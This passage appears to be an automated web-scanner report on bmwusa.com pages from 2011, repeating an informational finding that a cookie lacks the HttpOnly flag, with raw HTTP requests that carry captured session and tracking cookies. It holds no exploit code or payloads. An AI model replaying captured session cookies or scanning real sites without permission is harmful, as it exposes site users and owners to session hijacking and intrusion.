<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.259. http://www.bmwusa.com/standard/content/vehicles/2011/5/535ixdrivegt/5seriesgranturismomediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/535ixdrivegt/5seriesgranturismomediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/535ixdrivegt/5seriesgranturismomediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:58:24 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:18:24 GMT;path=/
Content-Length: 202297


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.260. http://www.bmwusa.com/standard/content/vehicles/2011/5/535ixdrivegt/5seriesgranturismomediagallery.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/535ixdrivegt/5seriesgranturismomediagallery.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/535ixdrivegt/5seriesgranturismomediagallery.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:55:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:15:36 GMT;path=/
Content-Length: 202298


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.261. http://www.bmwusa.com/standard/content/vehicles/2011/5/535ixdrivegt/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/535ixdrivegt/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/535ixdrivegt/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:56:14 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:16:14 GMT;path=/
Content-Length: 215086


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.262. http://www.bmwusa.com/standard/content/vehicles/2011/5/535ixdrivegt/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/535ixdrivegt/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/535ixdrivegt/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:55:07 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:15:07 GMT;path=/
Content-Length: 215087


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.263. http://www.bmwusa.com/standard/content/vehicles/2011/5/535ixdrivegt/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/535ixdrivegt/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/535ixdrivegt/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:56:01 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:16:01 GMT;path=/
Content-Length: 229148


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.264. http://www.bmwusa.com/standard/content/vehicles/2011/5/535ixdrivegt/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/535ixdrivegt/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/535ixdrivegt/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:55:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:15:20 GMT;path=/
Content-Length: 215501


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.265. http://www.bmwusa.com/standard/content/vehicles/2011/5/535ixdrivegt/modelhighlights/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/535ixdrivegt/modelhighlights/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/535ixdrivegt/modelhighlights/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:55:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:15:12 GMT;path=/
Content-Length: 215502


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.266. http://www.bmwusa.com/standard/content/vehicles/2011/5/535ixdrivesedan/5seriessedanmediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/535ixdrivesedan/5seriessedanmediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/535ixdrivesedan/5seriessedanmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:45:22 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:05:22 GMT;path=/
Content-Length: 201982


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.267. http://www.bmwusa.com/standard/content/vehicles/2011/5/535ixdrivesedan/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/535ixdrivesedan/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/535ixdrivesedan/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:45:00 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:05:00 GMT;path=/
Content-Length: 214938


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.268. http://www.bmwusa.com/standard/content/vehicles/2011/5/535ixdrivesedan/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/535ixdrivesedan/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/535ixdrivesedan/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:45:32 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:05:32 GMT;path=/
Content-Length: 227353


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.269. http://www.bmwusa.com/standard/content/vehicles/2011/5/535ixdrivesedan/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/535ixdrivesedan/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/535ixdrivesedan/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:45:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:05:18 GMT;path=/
Content-Length: 216385


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.270. http://www.bmwusa.com/standard/content/vehicles/2011/5/550igt/5seriesgranturismomediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/550igt/5seriesgranturismomediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/550igt/5seriesgranturismomediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:59:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:19:51 GMT;path=/
Content-Length: 202083


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.271. http://www.bmwusa.com/standard/content/vehicles/2011/5/550igt/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/550igt/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/550igt/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:58:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:18:40 GMT;path=/
Content-Length: 213862


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.272. http://www.bmwusa.com/standard/content/vehicles/2011/5/550igt/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/550igt/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/550igt/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 21:00:22 GMT
Connection: close
